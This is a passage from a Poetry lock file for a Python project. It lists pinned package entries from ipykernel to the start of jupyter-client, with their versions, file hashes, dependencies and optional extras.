version = "6.26.0"
description = "IPython Kernel for Jupyter"
optional = false
python-versions = ">=3.8"
files = [
{file = "ipykernel-6.26.0-py3-none-any.whl", hash = "sha256:3ba3dc97424b87b31bb46586b5167b3161b32d7820b9201a9e698c71e271602c"},
{file = "ipykernel-6.26.0.tar.gz", hash = "sha256:553856658eb8430bbe9653ea041a41bff63e9606fc4628873fc92a6cf3abd404"},
]
[package.dependencies]
appnope = {version = "*", markers = "platform_system == \"Darwin\""}
comm = ">=0.1.1"
debugpy = ">=1.6.5"
ipython = ">=7.23.1"
jupyter-client = ">=6.1.12"
jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0"
matplotlib-inline = ">=0.1"
nest-asyncio = "*"
packaging = "*"
psutil = "*"
pyzmq = ">=20"
tornado = ">=6.1"
traitlets = ">=5.4.0"
[package.extras]
cov = ["coverage[toml]", "curio", "matplotlib", "pytest-cov", "trio"]
docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "trio"]
pyqt5 = ["pyqt5"]
pyside6 = ["pyside6"]
test = ["flaky", "ipyparallel", "pre-commit", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov", "pytest-timeout"]
[[package]]
name = "ipython"
version = "8.12.3"
description = "IPython: Productive Interactive Computing"
optional = false
python-versions = ">=3.8"
files = [
{file = "ipython-8.12.3-py3-none-any.whl", hash = "sha256:b0340d46a933d27c657b211a329d0be23793c36595acf9e6ef4164bc01a1804c"},
{file = "ipython-8.12.3.tar.gz", hash = "sha256:3910c4b54543c2ad73d06579aa771041b7d5707b033bd488669b4cf544e3b363"},
]
[package.dependencies]
appnope = {version = "*", markers = "sys_platform == \"darwin\""}
backcall = "*"
colorama = {version = "*", markers = "sys_platform == \"win32\""}
decorator = "*"
jedi = ">=0.16"
matplotlib-inline = "*"
pexpect = {version = ">4.3", markers = "sys_platform != \"win32\""}
pickleshare = "*"
prompt-toolkit = ">=3.0.30,<3.0.37 || >3.0.37,<3.1.0"
pygments = ">=2.4.0"
stack-data = "*"
traitlets = ">=5"
typing-extensions = {version = "*", markers = "python_version < \"3.10\""}
[package.extras]
all = ["black", "curio", "docrepr", "ipykernel", "ipyparallel", "ipywidgets", "matplotlib", "matplotlib (!=3.2.0)", "nbconvert", "nbformat", "notebook", "numpy (>=1.21)", "pandas", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "qtconsole", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "trio", "typing-extensions"]
black = ["black"]
doc = ["docrepr", "ipykernel", "matplotlib", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "typing-extensions"]
kernel = ["ipykernel"]
nbconvert = ["nbconvert"]
nbformat = ["nbformat"]
notebook = ["ipywidgets", "notebook"]
parallel = ["ipyparallel"]
qtconsole = ["qtconsole"]
test = ["pytest (<7.1)", "pytest-asyncio", "testpath"]
test-extra = ["curio", "matplotlib (!=3.2.0)", "nbformat", "numpy (>=1.21)", "pandas", "pytest (<7.1)", "pytest-asyncio", "testpath", "trio"]
[[package]]
name = "ipython-genutils"
version = "0.2.0"
description = "Vestigial utilities from IPython"
optional = false
python-versions = "*"
files = [
{file = "ipython_genutils-0.2.0-py2.py3-none-any.whl", hash = "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8"},
{file = "ipython_genutils-0.2.0.tar.gz", hash = "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"},
]
[[package]]
name = "ipywidgets"
version = "8.1.1"
description = "Jupyter interactive widgets"
optional = false
python-versions = ">=3.7"
files = [
{file = "ipywidgets-8.1.1-py3-none-any.whl", hash = "sha256:2b88d728656aea3bbfd05d32c747cfd0078f9d7e159cf982433b58ad717eed7f"},
{file = "ipywidgets-8.1.1.tar.gz", hash = "sha256:40211efb556adec6fa450ccc2a77d59ca44a060f4f9f136833df59c9f538e6e8"},
]
[package.dependencies]
comm = ">=0.1.3"
ipython = ">=6.1.0"
jupyterlab-widgets = ">=3.0.9,<3.1.0"
traitlets = ">=4.3.1"
widgetsnbextension = ">=4.0.9,<4.1.0"
[package.extras]
test = ["ipykernel", "jsonschema", "pytest (>=3.6.0)", "pytest-cov", "pytz"]
[[package]]
name = "isodate"
version = "0.6.1"
description = "An ISO 8601 date/time/duration parser and formatter"
optional = true
python-versions = "*"
files = [
{file = "isodate-0.6.1-py2.py3-none-any.whl", hash = "sha256:0751eece944162659049d35f4f549ed815792b38793f07cf73381c1c87cbed96"},
{file = "isodate-0.6.1.tar.gz", hash = "sha256:48c5881de7e8b0a0d648cb024c8062dc84e7b840ed81e864c7614fd3c127bde9"},
]
[package.dependencies]
six = "*"
[[package]]
name = "isoduration"
version = "20.11.0"
description = "Operations with ISO 8601 durations"
optional = false
python-versions = ">=3.7"
files = [
{file = "isoduration-20.11.0-py3-none-any.whl", hash = "sha256:b2904c2a4228c3d44f409c8ae8e2370eb21a26f7ac2ec5446df141dde3452042"},
{file = "isoduration-20.11.0.tar.gz", hash = "sha256:ac2f9015137935279eac671f94f89eb00584f940f5dc49462a0c4ee692ba1bd9"},
]
[package.dependencies]
arrow = ">=0.15.0"
[[package]]
name = "jaraco-context"
version = "4.3.0"
description = "Context managers by jaraco"
optional = true
python-versions = ">=3.7"
files = [
{file = "jaraco.context-4.3.0-py3-none-any.whl", hash = "sha256:5d9e95ca0faa78943ed66f6bc658dd637430f16125d86988e77844c741ff2f11"},
{file = "jaraco.context-4.3.0.tar.gz", hash = "sha256:4dad2404540b936a20acedec53355bdaea223acb88fd329fa6de9261c941566e"},
]
[package.extras]
docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
testing = ["flake8 (<5)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"]
[[package]]
name = "jedi"
version = "0.19.1"
description = "An autocompletion tool for Python that can be used for text editors."
optional = false
python-versions = ">=3.6"
files = [
{file = "jedi-0.19.1-py2.py3-none-any.whl", hash = "sha256:e983c654fe5c02867aef4cdfce5a2fbb4a50adc0af145f70504238f18ef5e7e0"},
{file = "jedi-0.19.1.tar.gz", hash = "sha256:cf0496f3651bc65d7174ac1b7d043eff454892c708a87d1b683e57b569927ffd"},
]
[package.dependencies]
parso = ">=0.8.3,<0.9.0"
[package.extras]
docs = ["Jinja2 (==2.11.3)", "MarkupSafe (==1.1.1)", "Pygments (==2.8.1)", "alabaster (==0.7.12)", "babel (==2.9.1)", "chardet (==4.0.0)", "commonmark (==0.8.1)", "docutils (==0.17.1)", "future (==0.18.2)", "idna (==2.10)", "imagesize (==1.2.0)", "mock (==1.0.1)", "packaging (==20.9)", "pyparsing (==2.4.7)", "pytz (==2021.1)", "readthedocs-sphinx-ext (==2.1.4)", "recommonmark (==0.5.0)", "requests (==2.25.1)", "six (==1.15.0)", "snowballstemmer (==2.1.0)", "sphinx (==1.8.5)", "sphinx-rtd-theme (==0.4.3)", "sphinxcontrib-serializinghtml (==1.1.4)", "sphinxcontrib-websupport (==1.2.4)", "urllib3 (==1.26.4)"]
qa = ["flake8 (==5.0.4)", "mypy (==0.971)", "types-setuptools (==67.2.0.1)"]
testing = ["Django", "attrs", "colorama", "docopt", "pytest (<7.0.0)"]
[[package]]
name = "jieba3k"
version = "0.35.1"
description = "Chinese Words Segementation Utilities"
optional = true
python-versions = "*"
files = [
{file = "jieba3k-0.35.1.zip", hash = "sha256:980a4f2636b778d312518066be90c7697d410dd5a472385f5afced71a2db1c10"},
]
[[package]]
name = "jinja2"
version = "3.1.2"
description = "A very fast and expressive template engine."
optional = false
python-versions = ">=3.7"
files = [
{file = "Jinja2-3.1.2-py3-none-any.whl", hash = "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61"},
{file = "Jinja2-3.1.2.tar.gz", hash = "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852"},
]
[package.dependencies]
MarkupSafe = ">=2.0"
[package.extras]
i18n = ["Babel (>=2.7)"]
[[package]]
name = "jmespath"
version = "1.0.1"
description = "JSON Matching Expressions"
optional = true
python-versions = ">=3.7"
files = [
{file = "jmespath-1.0.1-py3-none-any.whl", hash = "sha256:02e2e4cc71b5bcab88332eebf907519190dd9e6e82107fa7f83b1003a6252980"},
{file = "jmespath-1.0.1.tar.gz", hash = "sha256:90261b206d6defd58fdd5e85f478bf633a2901798906be2ad389150c5c60edbe"},
]
[[package]]
name = "joblib"
version = "1.3.2"
description = "Lightweight pipelining with Python functions"
optional = true
python-versions = ">=3.7"
files = [
{file = "joblib-1.3.2-py3-none-any.whl", hash = "sha256:ef4331c65f239985f3f2220ecc87db222f08fd22097a3dd5698f693875f8cbb9"},
{file = "joblib-1.3.2.tar.gz", hash = "sha256:92f865e621e17784e7955080b6d042489e3b8e294949cc44c6eac304f59772b1"},
]
[[package]]
name = "jq"
version = "1.6.0"
description = "jq is a lightweight and flexible JSON processor."
optional = true
python-versions = ">=3.5"
files = [
{file = "jq-1.6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:5773851cfb9ec6525f362f5bf7f18adab5c1fd1f0161c3599264cd0118c799da"},
{file = "jq-1.6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a758df4eae767a21ebd8466dfd0066d99c9741d9f7fd4a7e1d5b5227e1924af7"},
{file = "jq-1.6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15cf9dd3e7fb40d029f12f60cf418374c0b830a6ea6267dd285b48809069d6af"},
{file = "jq-1.6.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c7e768cf5c25d703d944ef81c787d745da0eb266a97768f3003f91c4c828118d"},
{file = "jq-1.6.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:85a697b3cdc65e787f90faa1237caa44c117b6b2853f21263c3f0b16661b192c"},
{file = "jq-1.6.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:944e081c328501ddc0a22a8f08196df72afe7910ca11e1a1f21244410dbdd3b3"},
{file = "jq-1.6.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:09262d0e0cafb03acc968622e6450bb08abfb14c793bab47afd2732b47c655fd"},
{file = "jq-1.6.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:611f460f616f957d57e0da52ac6e1e6294b073c72a89651da5546a31347817bd"},
{file = "jq-1.6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aba35b5cc07cd75202148e55f47ede3f4d0819b51c80f6d0c82a2ca47db07189"},
{file = "jq-1.6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ef5ddb76b03610df19a53583348aed3604f21d0ba6b583ee8d079e8df026cd47"},
{file = "jq-1.6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:872f322ff7bfd7daff41b7e8248d414a88722df0e82d1027f3b091a438543e63"},
{file = "jq-1.6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ca7a2982ff26f4620ac03099542a0230dabd8787af3f03ac93660598e26acbf0"},
{file = "jq-1.6.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:316affc6debf15eb05b7fd8e84ebf8993042b10b840e8d2a504659fb3ba07992"},
{file = "jq-1.6.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:9bc42ade4de77fe4370c0e8e105ef10ad1821ef74d61dcc70982178b9ecfdc72"},
{file = "jq-1.6.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:02da59230912b886ed45489f3693ce75877f3e99c9e490c0a2dbcf0db397e0df"},
{file = "jq-1.6.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:7ea39f89aa469eb12145ddd686248916cd6d186647aa40b319af8444b1f45a2d"},
{file = "jq-1.6.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:6e9016f5ba064fabc527adb609ebae1f27cac20c8e0da990abae1cfb12eca706"},
{file = "jq-1.6.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:022be104a548f7fbddf103ce749937956df9d37a4f2f1650396dacad73bce7ee"},
{file = "jq-1.6.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d5a7f31f779e1aa3d165eaec237d74c7f5728227e81023a576c939ba3da34f8"},
{file = "jq-1.6.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f1533a2a15c42be3368878b4031b12f30441246878e0b5f6bedfdd7828cdb1f"},
{file = "jq-1.6.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8aa67a304e58aa85c550ec011a68754ae49abe227b37d63a351feef4eea4c7a7"},
{file = "jq-1.6.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0893d1590cfa6facaf787cc6c28ac51e47d0d06a303613f84d4943ac0ca98e32"},
{file = "jq-1.6.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:63db80b4803905a4f4f6c87a17aa1816c530f6262bc795773ebe60f8ab259092"},
{file = "jq-1.6.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e2c1f429e644cb962e846a6157b5352c3c556fbd0b22bba9fc2fea0710333369"},
{file = "jq-1.6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:bcf574f28809ec63b8df6456fdd4a981751b7466851e80621993b4e9d3e3c8ee"},
{file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:49dbe0f003b411ca52b5d0afaf09cad8e430a1011181c86f2ef720a0956f31c1"},
{file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5a9c4185269a5faf395aa7ca086c7b02c9c8b448d542be3b899041d06e0970"},
{file = "jq-1.6.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8265f3badcd125f234e55dfc02a078c5decdc6faafcd453fde04d4c0d2699886"},
{file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:c6c39b53d000d2f7f9f6338061942b83c9034d04f3bc99acae0867d23c9e7127"},
{file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:9897931ea7b9a46f8165ee69737ece4a2e6dbc8e10ececb81f459d51d71401df"},
{file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:6312237159e88e92775ea497e0c739590528062d4074544aacf12a08d252f966"},
{file = "jq-1.6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:aa786a60bdd1a3571f092a4021dd9abf6c46798530fa99f19ecf4f0fceaa7eaf"},
{file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22495573d8221320d3433e1aeded40132bd8e1726845629558bd73aaa66eef7b"},
{file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:711eabc5d33ef3ec581e0744d9cff52f43896d84847a2692c287a0140a29c915"},
{file = "jq-1.6.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:57e75c1563d083b0424690b3c3ef2bb519e670770931fe633101ede16615d6ee"},
{file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:c795f175b1a13bd716a0c180d062cc8e305271f47bbdb9eb0f0f62f7e4f5def4"},
{file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:227b178b22a7f91ae88525810441791b1ca1fc71c86f03190911793be15cec3d"},
{file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:780eb6383fbae12afa819ef676fc93e1548ae4b076c004a393af26a04b460742"},
{file = "jq-1.6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:08ded6467f4ef89fec35b2bf310f210f8cd13fbd9d80e521500889edf8d22441"},
{file = "jq-1.6.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:49e44ed677713f4115bd5bf2dbae23baa4cd503be350e12a1c1f506b0687848f"},
{file = "jq-1.6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:984f33862af285ad3e41e23179ac4795f1701822473e1a26bf87ff023e5a89ea"},
{file = "jq-1.6.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42264fafc6166efb5611b5d4cb01058887d050a6c19334f6a3f8a13bb369df5"},
{file = "jq-1.6.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a67154f150aaf76cc1294032ed588436eb002097dd4fd1e283824bf753a05080"},
{file = "jq-1.6.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:1b3b95d5fd20e51f18a42647fdb52e5d8aaf150b7a666dd659cf282a2221ee3f"},
{file = "jq-1.6.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:3a8d98f72111043e75610cad7fa9ec5aec0b1ee2f7332dc7fd0f6603ea8144f8"},
{file = "jq-1.6.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:487483f10ae8f70e6acf7723f31b329736de4b421ce56b2f43b46d5cbd7337b0"},
{file = "jq-1.6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:18a700f55b7ef83a1382edf0a48cb176b22bacd155e097375ef2345ff8621d97"},
{file = "jq-1.6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:68aec8534ac3c4705e524b4ef54f66b8bdc867df9e0af2c3895e82c6774b5374"},
{file = "jq-1.6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b7a164748dbd03bb06d23bab7ead7ba7e5c4fcfebea7b082bdcd21d14136931e"},
{file = "jq-1.6.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:aa22d24740276a8ce82411e4960ed2b5fab476230f913f9d9cf726f766a22208"},
{file = "jq-1.6.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c1a6fae1b74b3e0478e281eb6addedad7b32421221ac685e21c1d49af5e997f"},
{file = "jq-1.6.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ce628546c22792b8870b9815086f65873ebb78d7bf617b5a16dd839adba36538"},
{file = "jq-1.6.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7bb685f337cf5d4f4fe210c46220e31a7baec02a0ca0df3ace3dd4780328fc30"},
{file = "jq-1.6.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bdbbc509a35ee6082d79c1f25eb97c08f1c59043d21e0772cd24baa909505899"},
{file = "jq-1.6.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1b332dfdf0d81fb7faf3d12aabf997565d7544bec9812e0ac5ee55e60ef4df8c"},
{file = "jq-1.6.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3a4f6ef8c0bd19beae56074c50026665d66345d1908f050e5c442ceac2efe398"},
{file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5184c2fcca40f8f2ab1b14662721accf68b4b5e772e2f5336fec24aa58fe235a"},
{file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:689429fe1e07a2d6041daba2c21ced3a24895b2745326deb0c90ccab9386e116"},
{file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8405d1c996c83711570f16aac32e3bf2c116d6fa4254a820276b87aed544d7e8"},
{file = "jq-1.6.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:138d56c7efc8bb162c1cfc3806bd6b4d779115943af36c9e3b8ca644dde856c2"},
{file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fd28f8395687e45bba56dc771284ebb6492b02037f74f450176c102f3f4e86a3"},
{file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b2c783288bf10e67aad321b58735e663f4975d7ddfbfb0a5bca8428eee283bde"},
{file = "jq-1.6.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:206391ac5b2eb556720b94f0f131558cbf8d82d8cc7e0404e733eeef48bcd823"},
{file = "jq-1.6.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:35090fea1283402abc3a13b43261468162199d8b5dcdaba2d1029e557ed23070"},
{file = "jq-1.6.0-pp38-pypy38_pp73-macosx_11_0_arm64.whl", hash = "sha256:201c6384603aec87a744ad7b393cc4f1c58ece23d6e0a6c216a47bfcc405d231"},
{file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a3d8b075351c29653f29a1fec5d31bc88aa198a0843c0a9550b9be74d8fab33b"},
{file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:132e41f6e988c42b91c04b1b60dd8fa185a5c0681de5438ea1e6c64f5329768c"},
{file = "jq-1.6.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e1cb4751808b1d0dbddd37319e0c574fb0c3a29910d52ba35890b1343a1f1e59"},
{file = "jq-1.6.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:bd158911ed5f5c644f557ad94d6424c411560632a885eae47d105f290f0109cb"},
{file = "jq-1.6.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:64bc09ae6a9d9b82b78e15d142f90b816228bd3ee48833ddca3ff8c08e163fa7"},
{file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f4eed167322662f4b7e65235723c54aa6879f6175b6f9b68bc24887549637ffb"},
{file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:64bb4b305e2fabe5b5161b599bf934aceb0e0e7d3dd8f79246737ea91a2bc9ae"},
{file = "jq-1.6.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:165bfbe29bf73878d073edf75f384b7da8a9657ba0ab9fb1e5fe6be65ab7debb"},
{file = "jq-1.6.0.tar.gz", hash = "sha256:c7711f0c913a826a00990736efa6ffc285f8ef433414516bb14b7df971d6c1ea"},
]
[[package]]
name = "json5"
version = "0.9.14"
description = "A Python implementation of the JSON5 data format."
optional = false
python-versions = "*"
files = [
{file = "json5-0.9.14-py2.py3-none-any.whl", hash = "sha256:740c7f1b9e584a468dbb2939d8d458db3427f2c93ae2139d05f47e453eae964f"},
{file = "json5-0.9.14.tar.gz", hash = "sha256:9ed66c3a6ca3510a976a9ef9b8c0787de24802724ab1860bc0153c7fdd589b02"},
]
[package.extras]
dev = ["hypothesis"]
[[package]]
name = "jsonable"
version = "0.3.1"
description = "An abstract class that supports jsonserialization/deserialization."
optional = true
python-versions = "*"
files = [
{file = "jsonable-0.3.1-py2.py3-none-any.whl", hash = "sha256:f7754dd27b4734e42e7f8a61c2336bc98082f715e31e29a061a95843b102dc3a"},
{file = "jsonable-0.3.1.tar.gz", hash = "sha256:137b676e8e5819fa58518678c3d1f5463cab7e8466f69b3641cbc438042eaee4"},
]
[[package]]
name = "jsonlines"
version = "4.0.0"
description = "Library with helpers for the jsonlines file format"
optional = true
python-versions = ">=3.8"
files = [
{file = "jsonlines-4.0.0-py3-none-any.whl", hash = "sha256:185b334ff2ca5a91362993f42e83588a360cf95ce4b71a73548502bda52a7c55"},
{file = "jsonlines-4.0.0.tar.gz", hash = "sha256:0c6d2c09117550c089995247f605ae4cf77dd1533041d366351f6f298822ea74"},
]
[package.dependencies]
attrs = ">=19.2.0"
[[package]]
name = "jsonpatch"
version = "1.33"
description = "Apply JSON-Patches (RFC 6902)"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*"
files = [
{file = "jsonpatch-1.33-py2.py3-none-any.whl", hash = "sha256:0ae28c0cd062bbd8b8ecc26d7d164fbbea9652a1a3693f3b956c1eae5145dade"},
{file = "jsonpatch-1.33.tar.gz", hash = "sha256:9fcd4009c41e6d12348b4a0ff2563ba56a2923a7dfee731d004e212e1ee5030c"},
]
[package.dependencies]
jsonpointer = ">=1.9"
[[package]]
name = "jsonpointer"
version = "2.4"
description = "Identify specific nodes in a JSON document (RFC 6901)"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, !=3.6.*"
files = [
{file = "jsonpointer-2.4-py2.py3-none-any.whl", hash = "sha256:15d51bba20eea3165644553647711d150376234112651b4f1811022aecad7d7a"},
{file = "jsonpointer-2.4.tar.gz", hash = "sha256:585cee82b70211fa9e6043b7bb89db6e1aa49524340dde8ad6b63206ea689d88"},
]
[[package]]
name = "jsonschema"
version = "4.19.1"
description = "An implementation of JSON Schema validation for Python"
optional = false
python-versions = ">=3.8"
files = [
{file = "jsonschema-4.19.1-py3-none-any.whl", hash = "sha256:cd5f1f9ed9444e554b38ba003af06c0a8c2868131e56bfbef0550fb450c0330e"},
{file = "jsonschema-4.19.1.tar.gz", hash = "sha256:ec84cc37cfa703ef7cd4928db24f9cb31428a5d0fa77747b8b51a847458e0bbf"},
]
[package.dependencies]
attrs = ">=22.2.0"
fqdn = {version = "*", optional = true, markers = "extra == \"format-nongpl\""}
idna = {version = "*", optional = true, markers = "extra == \"format-nongpl\""}
importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""}
isoduration = {version = "*", optional = true, markers = "extra == \"format-nongpl\""}
jsonpointer = {version = ">1.13", optional = true, markers = "extra == \"format-nongpl\""}
jsonschema-specifications = ">=2023.03.6"
pkgutil-resolve-name = {version = ">=1.3.10", markers = "python_version < \"3.9\""}
referencing = ">=0.28.4"
rfc3339-validator = {version = "*", optional = true, markers = "extra == \"format-nongpl\""}
rfc3986-validator = {version = ">0.1.0", optional = true, markers = "extra == \"format-nongpl\""}
rpds-py = ">=0.7.1"
uri-template = {version = "*", optional = true, markers = "extra == \"format-nongpl\""}
webcolors = {version = ">=1.11", optional = true, markers = "extra == \"format-nongpl\""}
[package.extras]
format = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3987", "uri-template", "webcolors (>=1.11)"]
format-nongpl = ["fqdn", "idna", "isoduration", "jsonpointer (>1.13)", "rfc3339-validator", "rfc3986-validator (>0.1.0)", "uri-template", "webcolors (>=1.11)"]
[[package]]
name = "jsonschema-specifications"
version = "2023.7.1"
description = "The JSON Schema meta-schemas and vocabularies, exposed as a Registry"
optional = false
python-versions = ">=3.8"
files = [
{file = "jsonschema_specifications-2023.7.1-py3-none-any.whl", hash = "sha256:05adf340b659828a004220a9613be00fa3f223f2b82002e273dee62fd50524b1"},
{file = "jsonschema_specifications-2023.7.1.tar.gz", hash = "sha256:c91a50404e88a1f6ba40636778e2ee08f6e24c5613fe4c53ac24578a5a7f72bb"},
]
[package.dependencies]
importlib-resources = {version = ">=1.4.0", markers = "python_version < \"3.9\""}
referencing = ">=0.28.0"
[[package]]
name = "jupyter"
version = "1.0.0"
description = "Jupyter metapackage. Install all the Jupyter components in one go."
optional = false
python-versions = "*"
files = [
{file = "jupyter-1.0.0-py2.py3-none-any.whl", hash = "sha256:5b290f93b98ffbc21c0c7e749f054b3267782166d72fa5e3ed1ed4eaf34a2b78"},
{file = "jupyter-1.0.0.tar.gz", hash = "sha256:d9dc4b3318f310e34c82951ea5d6683f67bed7def4b259fafbfe4f1beb1d8e5f"},
{file = "jupyter-1.0.0.zip", hash = "sha256:3e1f86076bbb7c8c207829390305a2b1fe836d471ed54be66a3b8c41e7f46cc7"},
]
[package.dependencies]
ipykernel = "*"
ipywidgets = "*"
jupyter-console = "*"
nbconvert = "*"
notebook = "*"
qtconsole = "*"
[[package]]
name = "jupyter-client"
version = "8.5.0"
description = "Jupyter protocol implementation and client libraries"
optional = false
python-versions = ">=3.8"
files = [
